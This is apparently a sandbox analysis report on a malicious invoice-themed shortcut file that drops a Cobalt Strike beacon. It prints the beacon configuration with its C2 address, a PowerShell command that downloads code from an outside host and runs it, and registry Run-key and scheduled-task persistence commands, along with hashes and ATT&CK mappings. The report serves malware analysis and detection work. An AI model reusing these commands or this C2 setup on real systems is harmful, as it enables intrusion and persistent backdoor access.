Overview

overview

10

Static

static

1

Overdue_In...df.lnk

windows7-x64

3

Overdue_In...df.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    114s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-02-2023 16:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Overdue_Invoice_2023B.pdf.lnk

  • Size

    1KB

  • MD5

    094815ab6988cda2101381cbeeb0056e

  • SHA1

    df5f22ce9d8e0ee3ebca101f5112c6456088d317

  • SHA256

    0135c4f45de3e2187708033da3135210b03c9db4275dfa794dbcbff21b4f4df9

  • SHA512

    c8f3aae210a0157275c0f24e9175ef9d508c55fd5c8e48e6c10e95a79a9f41927d5574dc5197c9594f6fbfefe3eb19f851570c6bb5e0eaecd6311731e26e4363

Score
10/10
cobaltstrike987654321backdoorpersistencetrojan

Malware Config

Extracted

Family

cobaltstrike

Botnet

987654321

C2

http://185.225.74.52:443/favicon.js

Attributes
  • access_type

    512

  • beacon_type

    2048

  • host

    185.225.74.52,/favicon.js

  • http_header1

    AAAAEAAAABpIb3N0OiBidXNpbmVzc3NlcnZpY2VzLmNvbQAAAAoAAAARQ29ubmVjdGlvbjogY2xvc2UAAAAKAAAAE0FjY2VwdC1FbmNvZGluZzogYnIAAAAKAAAAFkFjY2VwdC1MYW5ndWFnZTogZW4tVVMAAAAHAAAAAAAAAA0AAAADAAAAAgAAABp3b29jb21tZXJjZV9pdGVtc19pbl9jYXJ0PQAAAAYAAAAGQ29va2llAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

  • http_header2

    AAAAEAAAABpIb3N0OiBidXNpbmVzc3NlcnZpY2VzLmNvbQAAAAoAAAARQ29ubmVjdGlvbjogY2xvc2UAAAAKAAAAGUFjY2VwdC1FbmNvZGluZzogZ3ppcCwgYnIAAAAKAAAAL0NvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkAAAABwAAAAEAAAANAAAAAwAAAAIAAAAIZGV0YWlscz0AAAAEAAAABwAAAAAAAAADAAAAAgAAAA5fX3Nlc3Npb25fX2lkPQAAAAYAAAAGQ29va2llAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

  • http_method1

    GET

  • http_method2

    POST

  • jitter

    9472

  • polling_time

    55991

  • port_number

    443

  • sc_process32

    %windir%\syswow64\dllhost.exe

  • sc_process64

    %windir%\sysnative\dllhost.exe

  • state_machine

    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCMEuNG3asVOp+bgSmSog10bB55R9e+aj5dF2sVbnRjA/dTkltRdDD0DdF5vJh/gURBikZ4FxqqmfqR2SPAheOzDDrYvV7ScpwPkZe8IUd/DbJmPs30ST9SGHn+eLjTQQEU+I142t7yTsO7HCKf1CTDMHfS3PNoz3V8ivNRwL1aiQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown1

    9.63976192e+08

  • unknown2

    AAAABAAAAAIAAANxAAAAAwAAAA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • uri

    /btn_bg

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/42.0.2311.135

  • watermark

    987654321

Signatures

  • Cobaltstrike

    Detected malicious payload which is part of Cobaltstrike.

    trojanbackdoorcobaltstrike
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Overdue_Invoice_2023B.pdf.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5000
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 Invoke-WebRequest 'http://billingservice.hopto.org/UY7G6S/s4Nt4.txt' -UseBasicParsing | Select-Object -Expand Content | powershell
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1308
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        3⤵
        • Blocklisted process makes network request
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1100
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\Invoice.pdf"
          4⤵
          • Checks processor information in registry
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2132
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2572
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=21B5C907505A0E52617CE897434ABB30 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              6⤵
                PID:4484
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4782532CF8BFD166D6E977C81EDEC328 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4782532CF8BFD166D6E977C81EDEC328 --renderer-client-id=2 --mojo-platform-channel-handle=1744 --allow-no-sandbox-job /prefetch:1
                6⤵
                  PID:4312
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7AC83CBFEE2F13C70836B7A7055C51CE --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7AC83CBFEE2F13C70836B7A7055C51CE --renderer-client-id=4 --mojo-platform-channel-handle=2180 --allow-no-sandbox-job /prefetch:1
                  6⤵
                    PID:5008
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2D1AD4ADF0C97CDFCDF1449F3A8DD10A --mojo-platform-channel-handle=2212 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                    6⤵
                      PID:4820
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3DC38C5C32415F51F53A42E9A2004E0D --mojo-platform-channel-handle=2632 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                      6⤵
                        PID:1520
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5FC3B0A6BAF7827216FD4F026B9F8376 --mojo-platform-channel-handle=2408 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                        6⤵
                          PID:3852
                    • C:\Windows\SysWOW64\attrib.exe
                      "C:\Windows\system32\attrib.exe" +h C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953
                      4⤵
                      • Views/modifies file attributes
                      PID:2140
                    • C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\RuntimeBroker.exe
                      "C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\RuntimeBroker.exe"
                      4⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                      PID:4380
                      • C:\Windows\System32\cmd.exe
                        /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftLibrary /t REG_SZ /d "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe"" /f
                        5⤵
                          PID:4360
                          • C:\Windows\system32\reg.exe
                            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftLibrary /t REG_SZ /d "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe"" /f
                            6⤵
                            • Adds Run key to start application
                            • Modifies registry key
                            PID:1708
                        • C:\Windows\System32\schtasks.exe
                          /F /Create /TN Microsoft_Library /sc minute /MO 80 /TR "powershell.exe -WindowStyle hidden -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe
                          5⤵
                          • Creates scheduled task(s)
                          PID:4584
                • C:\Windows\Explorer.EXE
                  C:\Windows\Explorer.EXE
                  1⤵
                    PID:760
                    • C:\windows\system32\wermgr.exe
                      "C:\windows\system32\wermgr.exe"
                      2⤵
                        PID:4248

                    Network

                    MITRE ATT&CK Matrix ATT&CK v6

                    Initial Access

                    Execution

                    Scheduled Task

                    1
                    T1053

                    Persistence

                    Registry Run Keys / Startup Folder

                    1
                    T1060

                    Scheduled Task

                    1
                    T1053

                    Hidden Files and Directories

                    1
                    T1158

                    Privilege Escalation

                    Scheduled Task

                    1
                    T1053

                    Defense Evasion

                    Modify Registry

                    3
                    T1112

                    Hidden Files and Directories

                    1
                    T1158

                    Credential Access

                    Discovery

                    Query Registry

                    2
                    T1012

                    System Information Discovery

                    3
                    T1082

                    Lateral Movement

                    Collection

                    Exfiltration

                    Command and Control

                    Impact

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                      Filesize

                      2KB

                      MD5

                      da716b5cb0693cd2dbbfd96430f6ec86

                      SHA1

                      84f1cc86cc4318d1033e8c435e8d5366f454f998

                      SHA256

                      9dd85493e4642fb90dbb13a2fc254023abba467f0a4a41b83f97f7fe3826ec0f

                      SHA512

                      cd010f7d327f2e66def5d08d9366d5ae03f69c8ac87f8b697ed17fbbd9b82f2a7b482509a2aae25d5fd53677906a53d9eda13d8cbf25bfc3654d3cb93b2b0c9e

                      Download Submit
                    • C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\RuntimeBroker.exe
                      Filesize

                      100KB

                      MD5

                      ba4cfe6461afa1004c52f19c8f2169dc

                      SHA1

                      ab8539ef6b2a93ff9589dec4b34a0257b6296c92

                      SHA256

                      e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628

                      SHA512

                      2c5190d7609767237311260f241c619b82434ca640f396bb9710d356286844f82f320f9e05525a38707f2a52977790c0c3e2a217b36a7f0095a87c138b939af0

                      Download Submit
                    • C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\RuntimeBroker.exe
                      Filesize

                      100KB

                      MD5

                      ba4cfe6461afa1004c52f19c8f2169dc

                      SHA1

                      ab8539ef6b2a93ff9589dec4b34a0257b6296c92

                      SHA256

                      e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628

                      SHA512

                      2c5190d7609767237311260f241c619b82434ca640f396bb9710d356286844f82f320f9e05525a38707f2a52977790c0c3e2a217b36a7f0095a87c138b939af0

                      Download Submit
                    • C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\UMPDC.dll
                      Filesize

                      391KB

                      MD5

                      1570c92c1c5f039c438295ac68ff7e82

                      SHA1

                      3ee6c1d3582361e8af4efec44b1d1420494ab728

                      SHA256

                      b41b4e32607a4e21593332da63ce1bcf9c1d43f8f6754789a43bea7428833ea4

                      SHA512

                      fbf28062d81538f814e1a615caf9993aa24e54fd0b7ff84ead7e22002bac0a4c866d334fd445d6c7844289a7310e82a0febd07d7f02536ea51d11f9f884e4992

                      Download Submit
                    • C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\info.txt
                      Filesize

                      174KB

                      MD5

                      ec5071963e2367e037a45fab530a5458

                      SHA1

                      fe9c636957dce8e9d633a5689466041637a70c26

                      SHA256

                      d4219b706d7d914ba1e0dc0c32804b522d3b38f0947e3b902a02c35d89f56259

                      SHA512

                      81f88a30d73bb468f95a6905c893c9100a2c83d6a69c2712265df0192f8e3400df6ad30e1a567a8472b999af38db8d583b7d234526095f0f4b1a5267081855aa

                      Download Submit
                    • C:\Users\Admin\AppData\Local\Temp\0f066b90-6bf6-4a01-a38e-90b98eb6a953\umpdc.dll
                      Filesize

                      391KB

                      MD5

                      1570c92c1c5f039c438295ac68ff7e82

                      SHA1

                      3ee6c1d3582361e8af4efec44b1d1420494ab728

                      SHA256

                      b41b4e32607a4e21593332da63ce1bcf9c1d43f8f6754789a43bea7428833ea4

                      SHA512

                      fbf28062d81538f814e1a615caf9993aa24e54fd0b7ff84ead7e22002bac0a4c866d334fd445d6c7844289a7310e82a0febd07d7f02536ea51d11f9f884e4992

                      Download Submit
                    • C:\Users\Admin\Downloads\Invoice.pdf
                      Filesize

                      6KB

                      MD5

                      662e6c1a869b8a4abc54a7ed8bc23088

                      SHA1

                      c16f1dfa1f2488072d87f100a7d11ecaf90ca9d4

                      SHA256

                      15d2050a1a60c36ae602981ac19e371a6fae40aed0f5aee6334fbcc721e5b140

                      SHA512

                      5bd17a8cbbb0a7a9565d434cfc507213c91bfeac4cea6b7ea0908ec71fbbcf9f3956d1b9b6c9059dbd466f5cfa7efa2948bc338a4331401b4c8be1e5343c9c99

                      Download Submit
                    • memory/1100-143-0x0000000006DA0000-0x0000000006E16000-memory.dmp
                      Filesize

                      472KB

                      Download
                    • memory/1100-152-0x0000000007470000-0x000000000748E000-memory.dmp
                      Filesize

                      120KB

                      Download
                    • memory/1100-141-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1100-142-0x0000000005E70000-0x0000000005EB4000-memory.dmp
                      Filesize

                      272KB

                      Download
                    • memory/1100-155-0x0000000004830000-0x000000000483A000-memory.dmp
                      Filesize

                      40KB

                      Download
                    • memory/1100-144-0x0000000007120000-0x00000000071B6000-memory.dmp
                      Filesize

                      600KB

                      Download
                    • memory/1100-145-0x00000000070C0000-0x00000000070E2000-memory.dmp
                      Filesize

                      136KB

                      Download
                    • memory/1100-146-0x00000000080D0000-0x0000000008674000-memory.dmp
                      Filesize

                      5.6MB

                      Download
                    • memory/1100-154-0x0000000004810000-0x0000000004822000-memory.dmp
                      Filesize

                      72KB

                      Download
                    • memory/1100-153-0x0000000007C50000-0x0000000007C5A000-memory.dmp
                      Filesize

                      40KB

                      Download
                    • memory/1100-149-0x0000000007B20000-0x0000000007B52000-memory.dmp
                      Filesize

                      200KB

                      Download
                    • memory/1100-150-0x0000000070870000-0x00000000708BC000-memory.dmp
                      Filesize

                      304KB

                      Download
                    • memory/1100-151-0x0000000070DF0000-0x0000000071144000-memory.dmp
                      Filesize

                      3.3MB

                      Download
                    • memory/1308-136-0x00000000063B0000-0x0000000006416000-memory.dmp
                      Filesize

                      408KB

                      Download
                    • memory/1308-134-0x0000000005D10000-0x0000000006338000-memory.dmp
                      Filesize

                      6.2MB

                      Download
                    • memory/1308-137-0x0000000006420000-0x0000000006486000-memory.dmp
                      Filesize

                      408KB

                      Download
                    • memory/1308-132-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1308-138-0x0000000006A40000-0x0000000006A5E000-memory.dmp
                      Filesize

                      120KB

                      Download
                    • memory/1308-135-0x0000000005B90000-0x0000000005BB2000-memory.dmp
                      Filesize

                      136KB

                      Download
                    • memory/1308-140-0x0000000006F20000-0x0000000006F3A000-memory.dmp
                      Filesize

                      104KB

                      Download
                    • memory/1308-133-0x0000000003590000-0x00000000035C6000-memory.dmp
                      Filesize

                      216KB

                      Download
                    • memory/1308-139-0x00000000082B0000-0x000000000892A000-memory.dmp
                      Filesize

                      6.5MB

                      Download
                    • memory/1520-175-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1708-193-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2132-147-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2140-156-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2572-157-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3852-178-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4248-188-0x000001378DA70000-0x000001378DAB4000-memory.dmp
                      Filesize

                      272KB

                      Download
                    • memory/4248-186-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4248-189-0x000001378DC10000-0x000001378DC8E000-memory.dmp
                      Filesize

                      504KB

                      Download
                    • memory/4312-162-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4360-191-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4380-180-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4380-187-0x00007FFF9A390000-0x00007FFF9A585000-memory.dmp
                      Filesize

                      2.0MB

                      Download
                    • memory/4380-194-0x00007FFF9A390000-0x00007FFF9A585000-memory.dmp
                      Filesize

                      2.0MB

                      Download
                    • memory/4484-159-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4584-192-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4820-172-0x0000000000000000-mapping.dmp
                      Download
                    • memory/5008-167-0x0000000000000000-mapping.dmp
                      Download